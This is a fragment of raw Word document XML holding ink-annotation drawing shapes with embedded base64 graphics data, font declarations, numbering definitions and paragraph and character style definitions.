o:gfxdata="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5GLyduAAAACEBAAAZAAAAZHJz&#10;L19yZWxzL2Uyb0RvYy54bWwucmVsc4XPsWrEMAwG4L3QdzDaGyUdylHiZDkOspYUbjWOkpjEsrGc&#10;0nv7euzBwQ0ahND3S23/63f1Q0lcYA1NVYMitmFyvGj4Hi9vJ1CSDU9mD0wabiTQd68v7RftJpcl&#10;WV0UVRQWDWvO8RNR7EreSBUicZnMIXmTS5sWjMZuZiF8r+sPTP8N6O5MNUwa0jA1oMZbLMnP7TDP&#10;ztI52MMT5wcRaA/JwV/9XlCTFsoaHG9YqqnKoYBdi3ePdX9QSwMEFAAAAAgAh07iQAMVKdoFAQAA&#10;LQIAABMAAABbQ29udGVudF9UeXBlc10ueG1slZHBTsMwEETvSPyD5StKnPaAEGrSAylHQKh8gGVv&#10;Eqv22vKa0P49TtpeEKXi4IO9M29G69V67ywbIZLxWPNFWXEGqLw22Nf8Y/tcPHBGSaKW1iPU/ADE&#10;183tzWp7CEAsu5FqPqQUHoUgNYCTVPoAmCedj06mfI29CFLtZA9iWVX3QnlMgKlIE4M3qxY6+WkT&#10;2+zz87FJBEucPR2FU1bNZQjWKJlyUzGi/pFSnBLK7Jw1NJhAd7kGF78mTJPLASffa15NNBrYm4zp&#10;RbpcQ+hIQvsvjDCWf0Omlo4K33VGQdlGarPtHcZzq0t0WPrWq//CN7PrGtvgTuSzuELPEmfPLDF/&#10;dvMNUEsBAhQAFAAAAAgAh07iQAMVKdoFAQAALQIAABMAAAAAAAAAAQAgAAAAJwgAAFtDb250ZW50&#10;X1R5cGVzXS54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABgAAAAAAAAAAABAAAADyBQAA&#10;X3JlbHMvUEsBAhQAFAAAAAgAh07iQIoUZjzRAAAAlAEAAAsAAAAAAAAAAQAgAAAAFgYAAF9yZWxz&#10;Ly5yZWxzUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAAAAAAAAAGRycy9Q&#10;SwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACgAAAAAAAAAAABAAAAAQBwAAZHJzL19yZWxzL1BL&#10;AQIUABQAAAAIAIdO4kB5GLyduAAAACEBAAAZAAAAAAAAAAEAIAAAADgHAABkcnMvX3JlbHMvZTJv&#10;RG9jLnhtbC5yZWxzUEsBAhQAFAAAAAgAh07iQDLJyenXAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAA&#10;AGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kDwVN4SnAEAAIoDAAAOAAAAAAAAAAEAIAAA&#10;ACYBAABkcnMvZTJvRG9jLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAIAAAAAAAAAAAA&#10;EAAAAO4CAABkcnMvaW5rL1BLAQIUABQAAAAIAIdO4kD/JV0ZsAIAAHcGAAAQAAAAAAAAAAEAIAAA&#10;ABQDAABkcnMvaW5rL2luazEueG1sUEsFBgAAAAAKAAoATAIAAF0JAAAAAA==&#10;">
                <v:imagedata r:id="rId76" o:title=""/>
                <o:lock v:ext="edit"/>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5382260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>270510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="174625" cy="573405"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="61" name="墨迹 61"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId77">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="61" name="墨迹 61"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="6068060" y="8515350"/>
                            <a:ext cx="174625" cy="573405"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:423.8pt;margin-top:21.3pt;height:45.15pt;width:13.75pt;z-index:251682816;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;WADHWxMRDiUB1jkF4hy0cAuih3fgryTcGbyzy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eRi8nbgAAAAhAQAAGQAAAGRycy9fcmVscy9lMm9E&#10;b2MueG1sLnJlbHOFz7FqxDAMBuC90Hcw2hslHcpR4mQ5DrKWFG41jpKYxLKxnNJ7+3rswcENGoTQ&#10;90tt/+t39UNJXGANTVWDIrZhcrxo+B4vbydQkg1PZg9MGm4k0HevL+0X7SaXJVldFFUUFg1rzvET&#10;UexK3kgVInGZzCF5k0ubFozGbmYhfK/rD0z/DejuTDVMGtIwNaDGWyzJz+0wz87SOdjDE+cHEWgP&#10;ycFf/V5QkxbKGhxvWKqpyqGAXYt3j3V/UEsDBBQAAAAIAIdO4kADFSnaBQEAAC0CAAATAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbJWRwU7DMBBE70j8g+UrSpz2gBBq0gMpR0CofIBlbxKr9trymtD+PU7a&#10;XhCl4uCDvTNvRuvVeu8sGyGS8VjzRVlxBqi8NtjX/GP7XDxwRkmiltYj1PwAxNfN7c1qewhALLuR&#10;aj6kFB6FIDWAk1T6AJgnnY9OpnyNvQhS7WQPYllV90J5TICpSBODN6sWOvlpE9vs8/OxSQRLnD0d&#10;hVNWzWUI1iiZclMxov6RUpwSyuycNTSYQHe5Bhe/JkyTywEn32teTTQa2JuM6UW6XEPoSEL7L4ww&#10;ln9DppaOCt91RkHZRmqz7R3Gc6tLdFj61qv/wjez6xrb4E7ks7hCzxJnzywxf3bzDVBLAQIUABQA&#10;AAAIAIdO4kADFSnaBQEAAC0CAAATAAAAAAAAAAEAIAAAABwIAABbQ29udGVudF9UeXBlc10ueG1s&#10;UEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAQAAAA5wUAAF9yZWxzL1BLAQIU&#10;ABQAAAAIAIdO4kCKFGY80QAAAJQBAAALAAAAAAAAAAEAIAAAAAsGAABfcmVscy8ucmVsc1BLAQIU&#10;AAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAEAAAAAAAAABkcnMvUEsBAhQACgAAAAAA&#10;h07iQAAAAAAAAAAAAAAAAAoAAAAAAAAAAAAQAAAABQcAAGRycy9fcmVscy9QSwECFAAUAAAACACH&#10;TuJAeRi8nbgAAAAhAQAAGQAAAAAAAAABACAAAAAtBwAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVs&#10;c1BLAQIUABQAAAAIAIdO4kDRF+LV1gAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJl&#10;di54bWxQSwECFAAUAAAACACHTuJA0SoOF6QBAACMAwAADgAAAAAAAAABACAAAAAlAQAAZHJzL2Uy&#10;b0RvYy54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACAAAAAAAAAAAABAAAAD1AgAAZHJz&#10;L2luay9QSwECFAAUAAAACACHTuJA+0UM+J4CAAA+BgAAEAAAAAAAAAABACAAAAAbAwAAZHJzL2lu&#10;ay9pbmsxLnhtbFBLBQYAAAAACgAKAEwCAABSCQAAAAA=&#10;">
                <v:imagedata r:id="rId78" o:title=""/>
                <o:lock v:ext="edit"/>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5490845</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>604520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="458470" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="62" name="墨迹 62"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId79">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="62" name="墨迹 62"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="6176645" y="8849360"/>
                            <a:ext cx="458470" cy="133350"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:432.35pt;margin-top:47.6pt;height:10.5pt;width:36.1pt;z-index:251683840;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;cdC4X3W4C3iHL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HkYvJ24AAAAIQEAABkAAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzhc+xasQw&#10;DAbgvdB3MNobJR3KUeJkOQ6ylhRuNY6SmMSysZzSe/t67MHBDRqE0PdLbf/rd/VDSVxgDU1VgyK2&#10;YXK8aPgeL28nUJINT2YPTBpuJNB3ry/tF+0mlyVZXRRVFBYNa87xE1HsSt5IFSJxmcwheZNLmxaM&#10;xm5mIXyv6w9M/w3o7kw1TBrSMDWgxlssyc/tMM/O0jnYwxPnBxFoD8nBX/1eUJMWyhocb1iqqcqh&#10;gF2Ld491f1BLAwQUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAFtDb250ZW50X1R5cGVzXS54bWyV&#10;kcFOwzAQRO9I/IPlK0qc9oAQatIDKUdAqHyAZW8Sq/ba8prQ/j1O2l4QpeLgg70zb0br1XrvLBsh&#10;kvFY80VZcQaovDbY1/xj+1w8cEZJopbWI9T8AMTXze3NansIQCy7kWo+pBQehSA1gJNU+gCYJ52P&#10;TqZ8jb0IUu1kD2JZVfdCeUyAqUgTgzerFjr5aRPb7PPzsUkES5w9HYVTVs1lCNYomXJTMaL+kVKc&#10;EsrsnDU0mEB3uQYXvyZMk8sBJ99rXk00GtibjOlFulxD6EhC+y+MMJZ/Q6aWjgrfdUZB2UZqs+0d&#10;xnOrS3RY+tar/8I3s+sa2+BO5LO4Qs8SZ88sMX928w1QSwECFAAUAAAACACHTuJAAxUp2gUBAAAt&#10;AgAAEwAAAAAAAAABACAAAAALCAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAA&#10;AAAAAAAAAAAAAAAGAAAAAAAAAAAAEAAAANYFAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEA&#10;AACUAQAACwAAAAAAAAABACAAAAD6BQAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAA&#10;AAAAAAAABAAAAAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAK&#10;AAAAAAAAAAAAEAAAAPQGAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkA&#10;AAAAAAAAAQAgAAAAHAcAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJA&#10;iLstjNgAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgA&#10;h07iQO6Wp1elAQAAigMAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAA&#10;AAAAh07iQAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA+AIAAGRycy9pbmsvUEsBAhQAFAAAAAgA&#10;h07iQFLLuM+KAgAAGgYAABAAAAAAAAAAAQAgAAAAHgMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAA&#10;AAoACgBMAgAAQQkAAAAA&#10;">
                <v:imagedata r:id="rId80" o:title=""/>
                <o:lock v:ext="edit"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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IDFont+F2">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="CIDFont+F4">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="CIDFont+F6">
    <w:altName w:val="Times New Roman"/>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E25FA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CE25FA2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="570" w:hanging="57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4EA1A2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44EA1A2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9B32AF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49B32AF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364B0521"/>
    <w:rsid w:val="36D212CD"/>
    <w:rsid w:val="41B46AAD"/>
    <w:rsid w:val="4B8E439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2">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="17"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">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Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="6">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FollowedHyperlink"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="folHlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="7"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2"/>
      <w:color w:val="000000"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="fontstyle11"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="CIDFont+F4" w:hAnsi="CIDFont+F4"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="fontstyle21"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="CIDFont+F6" w:hAnsi="CIDFont+F6"/>
      <w:color w:val="000000"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
